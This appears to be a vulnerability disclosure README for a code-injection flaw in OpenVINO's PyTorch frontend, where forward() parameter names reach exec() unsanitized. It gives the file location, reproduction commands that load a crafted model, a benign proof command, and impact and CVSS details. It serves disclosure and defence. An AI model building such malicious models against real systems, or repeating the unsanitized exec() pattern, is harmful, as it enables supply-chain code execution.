| # OpenVINO Code Injection via exec() PoC — EXEC-VULN-01 | |
| ## Vulnerability | |
| Code injection in the PyTorch frontend at `src/bindings/python/src/openvino/frontend/pytorch/utils.py:204`. | |
| Model `forward()` parameter names are interpolated into a Python class template and passed to `exec()` without sanitization. | |
| ## PoC | |
| `poc_exec_injection.py` creates a PyTorch model with a crafted `forward()` parameter name containing Python code. When `openvino.convert_model()` processes this model, the parameter name is interpolated into the template string and `exec()` runs the injected code. | |
| ## Reproduction | |
| ```bash | |
| pip install torch openvino | |
| python poc_exec_injection.py | |
| # Creates malicious_model.pt | |
| python -c " | |
| import torch, openvino as ov | |
| model = torch.load('malicious_model.pt') | |
| ov.convert_model(model) | |
| # Injected code executes: id > /tmp/openvino-rce-proof.txt | |
| " | |
| cat /tmp/openvino-rce-proof.txt | |
| # Shows: uid=... output from injected command | |
| ``` | |
| ## Impact | |
| Arbitrary code execution when converting a malicious PyTorch model via `openvino.convert_model()`. Supply chain attack via models published to HuggingFace or shared internally. | |
| ## CWE | |
| CWE-94 (Improper Control of Generation of Code) | |
| ## CVSS | |
| CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H — 8.1 | |